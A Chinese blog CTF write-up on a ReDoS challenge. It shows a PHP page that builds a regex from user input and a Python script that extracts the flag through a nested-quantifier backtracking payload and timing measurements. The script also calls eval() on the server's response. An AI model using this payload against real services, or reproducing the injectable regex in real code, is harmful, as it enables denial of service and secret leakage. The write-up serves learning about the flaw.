2023-04-14  60e7fabdee214ab2a5a51559fd2dd056 99+   2 分钟   0.3 k0次访问

redos

midnightCTF,有这么一道题,很是神奇(

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php

// include_once('./flag.php');
$FLAG = "flag{Test_very_very_very_long_flag}";
error_reporting(E_ALL);
highlight_file(__FILE__);

$startTime = microtime(true);
if (!empty($_GET['x'])){
    preg_match('/'.$_GET['x'].'/', $FLAG, $matches);
}

$endTime = microtime(true);
$runTime = $endTime - $startTime;

echo "<br /><br />\n";
echo "<strong>Exec Time:</strong> ".$runTime."<br />\n";

起初是认为正则表达式/e能命令执行,赛后复现的时候才发现是Redos

肥肠好用的正则表达式工具

原理很简单,就是利用回溯、贪婪等方式,让正则表达式进行一个大量的工作,这样就产生了一个时间延迟,于是乎就可以直接开始注入了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from lxml import etree
import requests

ans = ""

small = [chr(i) for i in range(ord('a'), ord('z') + 1)]
small += [chr(i) for i in range(ord('A'), ord('Z') + 1)]
small += ["{", "}", "-","_"]

for _ in range(0,20):
    for i in small:
        _tmp = {}    
        u = f"http://127.0.0.1/midnight.php/?x={ans + i}|(a*(b*(c*(d*(e*(f*.*.*.*.*.*.*.*.*.*.*.*.*(g*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(].*.*.*.*.*.*.*.*.*.*.*))))))))"
        r = requests.get(u)
        html = etree.HTML(r.text)
        time = html.xpath("/html/body/text()")[1]
        _tmp_time = eval(time)
        if _tmp_time <0.0005:
            print(i,time)
            ans += i
print(ans)
# print(timemap[timelist.sort(reverse=True)[0]])

redos

xn--upon-eu0gs25bb4r113aow1c.googles.icu/2023/04/14/Redos/

作者

UPON2021

发布于

2023-04-14

更新于

2023-04-14

许可协议

# 相关文章
  1.一次基于ast的python反混淆尝试
  2.碎碎念
  3.DasctfSU6月赛
  4.hxpctf valentine
  5.某游私服原理
  6.CBC反转攻击详解
  7.文件上传备忘录
  8.Round 6复现
评论
关注我

:D 一言句子获取中...

链接

最新评论

加载中,最新评论有1分钟缓存...

最新文章

分类

归档

标签

CTF5
WEB5
复现4
ETH2
RCE2
Solidity2
ThinkPHP2
python2
ssti2
upload2
web2
Blockchain1
Crypto1
DOS1
Go1
Hexo1
Javascript1
LFI1
MITM1
PHP1
查看全部>>

订阅更新

×